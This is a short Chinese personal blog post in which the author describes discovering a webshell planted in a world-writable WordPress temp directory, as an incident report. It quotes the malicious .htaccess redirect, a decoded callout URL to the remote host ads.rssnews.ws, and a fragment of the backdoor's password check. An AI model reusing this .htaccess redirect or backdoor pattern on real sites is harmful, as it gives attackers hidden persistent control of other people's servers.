险,博客被挂马 » 荒野无灯weblog

Keep It Simple, Stupid.

荒野无灯weblog

险,博客被挂马

今天上FTP看下,有意外发现:
在wp-content/temp目录下多了两个文件:
php muma
其中.htaccess 内容如下:

Options -MultiViews
ErrorDocument 404 //blog/wp-content/temp/200892.php

php文件内容如下:

这个temp目录我当时是为了方便更新插件把权限设置成了777,还好只有几个目录有写权限,而且后台禁止所有除我的ip以外的ip 地址访问。

我只解密了其中一个变量:
[cc lang="html"]http://ads.rssnews.ws/?bmV0YmVhbnMuemhvdWJvLmNvbQ==.bmV0YmVhbnMuemhvdWJvLmNvbQ==.L3Rlc3QvZS5waHA=.L3Rlc3QvZS5waHA=…TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggaTY4NjsgZW4tVVM7IHJ2OjEuOS4wLjE0KSBHZWNrby8yMDA5MDkwMjE2IFVidW50dS85LjA0IChqYXVudHkpIEZpcmVmb3gvMy4wLjE0IEdUQjU=.MTkyLjE2OC4xLjI=.e.L2hvbWUvemhvdWJvL3dvcmtzcGFjZS9uZXRiZWFucy90ZXN0L2UucGhw.ZW4tdXMsZW47cT0wLjcsemgtY247cT0wLjM=
大概是用远程文件包含,然后再eval执行代码。而且貌似可以当作webshell控制:因为其中有这么一句:

isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="aea9e93f574c4e737df3db20658c710b") $f=$_REQUEST["id"]

从时间看是我暑假在家时被挂的马,那时我正好在家,没有连网,也没怎么查看FTP。
所有子其他子站点下只要是777的目录,都被挂了相同的马,而且那个php webshell 的文件名是随机生成的。
我猜测这可以是LP的服务器的问题。

ads.rssnews.wsIP为66.226.75.10
物理地址为“美国 加利福尼亚州“ ,也就是我现在服务器所在的地方。

Tagged in : wp问题

All Comments (0)
Gravatar image
No Comments